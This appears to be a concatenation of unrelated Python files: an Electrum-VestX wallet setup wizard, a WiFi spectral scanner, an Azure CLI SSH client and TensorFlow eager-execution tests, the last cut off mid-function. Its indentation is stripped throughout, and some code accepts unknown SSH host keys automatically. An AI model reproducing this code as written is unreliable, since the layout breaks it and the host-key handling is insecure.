text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
except:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 =_("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
self.wizard.terminate(aborted=True)
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum_vestx.mnemonic import Mnemonic
from electrum_vestx.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
def is_valid(x):
try:
return kwargs['is_valid'](x)
except:
return False
self.is_valid = is_valid
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
def protected_on_finished():
try:
on_finished()
except Exception as e:
self.show_error(str(e))
Clock.schedule_once(lambda dt: protected_on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://electrum_vestx/gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, *, storage=None, aborted=False):
if storage is None and not aborted:
storage = self.create_storage(self.path)
self.dispatch('on_wizard_complete', storage)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
if force_disable_encrypt_cb:
# do not request PIN for watching-only wallets
run_next(None, False)
return
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, False)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
scanner.py
|
from multiprocessing import Process, Value
from ctypes import c_bool
import os
import time
from .spectrum_reader import SpectrumReader
class Scanner(object):
interface = None
freqlist = None
process = None
debugfs_dir = None
spectrum_reader = None
def __init__(self, interface):
self.interface = interface
self.phy = ""
self.debugfs_dir = self._find_debugfs_dir()
if not self.debugfs_dir:
raise Exception, \
'Unable to access spectral_scan_ctl file for interface %s' % interface
self.ctl_file = '%s/spectral_scan_ctl' % self.debugfs_dir
self.sample_count_file = '%s/spectral_count' % self.debugfs_dir
self.short_repeat_file = '%s/spectral_short_repeat' % self.debugfs_dir
self.cur_chan = 6
self.sample_count = 8
self.process = None
self.set_freqs(2412, 2472, 5)
self.spectrum_reader = SpectrumReader('%s/spectral_scan0' % self.debugfs_dir)
def dev_to_phy(self, dev):
f = open('/sys/class/net/%s/phy80211/name' % dev)
phy = f.read().strip()
f.close()
return phy
def _find_debugfs_dir(self):
''' search debugfs for spectral_scan_ctl for this interface '''
for dirname, subd, files in os.walk('/sys/kernel/debug/ieee80211'):
if 'spectral_scan_ctl' in files:
phy = dirname.split(os.path.sep)[-2]
if phy == self.dev_to_phy(self.interface):
self.phy = phy
return dirname
return None
def _scan(self, scanning):
while scanning.value:
cmd = 'iw dev %s scan trigger' % self.interface
if self.freqlist:
cmd = '%s freq %s' % (cmd, ' '.join(self.freqlist))
os.system('%s >/dev/null 2>/dev/null' % cmd)
time.sleep(0.1)
def set_freqs(self, minf, maxf, spacing):
self.freqlist = ['%s' % x for x in range(minf, maxf + spacing, spacing)]
def cmd_chanscan(self):
f = open(self.ctl_file, 'w')
f.write("chanscan")
f.close()
def cmd_disable(self):
f = open(self.ctl_file, 'w')
f.write("disable")
f.close()
def cmd_set_samplecount(self, count):
print "set sample count to %d" % count
f = open(self.sample_count_file, 'w')
f.write("%s" % count)
f.close()
def cmd_set_short_repeat(self, short_repeat):
f = open(self.short_repeat_file, 'w')
f.write("%s" % short_repeat)
f.close()
def start(self):
if self.process is None:
self.scanning = Value(c_bool, True)
self.process = Process(target=self._scan, args=(self.scanning,))
self.process.start()
def stop(self):
self.cmd_disable()
if self.process is not None:
self.scanning.value = False
self.process.join()
self.process = None
self.spectrum_reader.flush()
def get_debugfs_dir(self):
return self.debugfs_dir
|
acs_client.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import socket
import subprocess
import threading
from time import sleep
from os.path import expanduser, join, isfile
import os
import paramiko
import paramiko.agent
from sshtunnel import SSHTunnelForwarder
from scp import SCPClient
from knack.prompting import prompt_pass
from knack.util import CLIError
def _load_key(key_filename):
pkey = None
try:
pkey = paramiko.RSAKey.from_private_key_file(key_filename, None)
except paramiko.PasswordRequiredException:
key_pass = prompt_pass('Password for private key:')
pkey = paramiko.RSAKey.from_private_key_file(key_filename, key_pass)
if pkey is None:
raise CLIError('failed to load key: {}'.format(key_filename))
return pkey
def _load_keys(key_filename=None, allow_agent=True):
keys = []
default_key_path = join(expanduser("~"), '.ssh', 'id_rsa')
if key_filename is not None:
key = _load_key(key_filename)
keys.append(key)
if allow_agent:
agent = paramiko.agent.Agent()
for key in agent.get_keys():
keys.append(key)
if not keys and isfile(default_key_path):
key = _load_key(default_key_path)
keys.append(key)
if not keys:
raise CLIError('No keys available in ssh agent or no key in {}. '
'Do you need to add keys to your ssh agent via '
'ssh-add or specify a --ssh-key-file?'.format(default_key_path))
return keys
def secure_copy(user, host, src, dest, key_filename=None, allow_agent=True):
keys = _load_keys(key_filename, allow_agent)
pkey = keys[0]
ssh = paramiko.SSHClient()
proxy = None
ssh_config_file = os.path.expanduser("~/.ssh/config")
if os.path.isfile(ssh_config_file):
conf = paramiko.SSHConfig()
with open(ssh_config_file) as f:
conf.parse(f)
host_config = conf.lookup(host)
if 'proxycommand' in host_config:
proxy = paramiko.ProxyCommand(host_config['proxycommand'])
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host, username=user, pkey=pkey, sock=proxy)
scp = SCPClient(ssh.get_transport())
try:
scp.get(src, dest)
scp.close()
except paramiko.ssh_exception.SSHException:
subprocess.call(["scp", "{}@{}:{}".format(user, host, src), dest])
class ACSClient(object):
def __init__(self, client=None):
self.client = client
self.transport = None
self.tunnel_server = None
self.host = None
self.username = None
self.port = None
def __del__(self):
if self.transport is not None:
self.transport.close()
if self.client is not None:
self.client.close()
if self.tunnel_server is not None:
self.tunnel_server.close_tunnel()
def connect(self, host, username, port=2200,
key_filename=None):
"""
Creates a connection to the remote server.
:param host: Remote host
:type host: String
:param username: User name to connect to the remote host
:type username: String
:param port: Remote host port
:type port: Number
"""
if not host:
raise ValueError('Host is missing')
if not username:
raise ValueError('Username is missing')
if not port:
raise ValueError('Missing port')
self.host = host
self.username = username
self.port = port
if self.client is None:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
pkey = None
if key_filename is not None:
pkey = _load_key(key_filename)
self.client.connect(
hostname=host,
port=port,
username=username,
pkey=pkey)
self.transport = self.client.get_transport()
return self.transport is not None
def run(self, command, background=False):
"""
Runs a command on the remote host
:param command: Command to run on the remote host
:type command: String
:param background: True to run it in a separate thread,
False should be run in the foreground
:type command: Boolean
"""
if background:
t = threading.Thread(target=ACSClient._run_cmd, args=(self, command))
t.daemon = True
t.start()
return None
return self._run_cmd(command)
def _run_cmd(self, command):
"""
Runs a command on the remote host
:param command: Command to run on the remote host
:type command: String
"""
if not command:
raise ValueError('Command is missing')
_, stdout, stderr = self.client.exec_command(command)
return stdout, stderr
def file_exists(self, file_path):
"""
Checks if file on the remote exists
:param file_path: Full path to the file on remote machine
:type file_path: String
"""
if not file_path:
raise ValueError('Missing file path')
if self.transport is None:
raise TypeError('Transport cannot be none')
sftp = self.transport.open_sftp_client()
result = None
try:
sftp.stat(file_path)
result = True
except IOError:
result = False
finally:
sftp.close()
return result
def create_tunnel(self, remote_host, remote_port, local_port=0):
"""
Creates a tunnel to the remote host
:param remote_host: Remote host to tunnel to
:type remote_host: String
:param remote_port: Remote port to tunnel to
:type remote_port: Number
:param local_port: Local port. If set to 0, random local port is selected
:type local_port: Number
"""
if local_port is 0:
local_port = self.get_available_local_port()
with SSHTunnelForwarder((self.host, self.port),
ssh_username=self.username,
remote_bind_address=(remote_host, remote_port),
local_bind_address=('0.0.0.0', local_port)):
try:
while True:
sleep(1)
except KeyboardInterrupt:
pass
@staticmethod
def get_available_local_port():
"""
Gets a random, available local port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # pylint: disable=no-member
s.bind(('', 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return constant_op.constant(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_virtual_device_configuration(cpus[0], [
context.VirtualDeviceConfiguration(),
context.VirtualDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegexp(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertIsNone(ctx.summary_writer)
ctx.summary_writer = 'mock'
self.assertEqual('mock', ctx.summary_writer)
self.assertIsNone(ctx.summary_recording)
ctx.summary_recording = 'mock'
self.assertEqual('mock', ctx.summary_recording)
self.assertIsNone(ctx.summary_step)
ctx.summary_step = 'mock'
self.assertEqual('mock', ctx.summary_step)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testRunMetadata(self):
context.enable_run_metadata()
t = constant_op.constant(1.0)
_ = t + t # Runs an operation which will be in the RunMetadata
run_metadata = context.export_run_metadata()
context.disable_run_metadata()
step_stats = run_metadata.step_stats
self.assertGreater(len(step_stats.dev_stats), 0)
cpu_stats = step_stats.dev_stats[0]
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
cpu_stats.device)
self.assertGreaterEqual(len(cpu_stats.node_stats), 1)
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('gpu:0'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.summary_writer,
ctx.summary_recording,
ctx.summary_step,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegexp(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
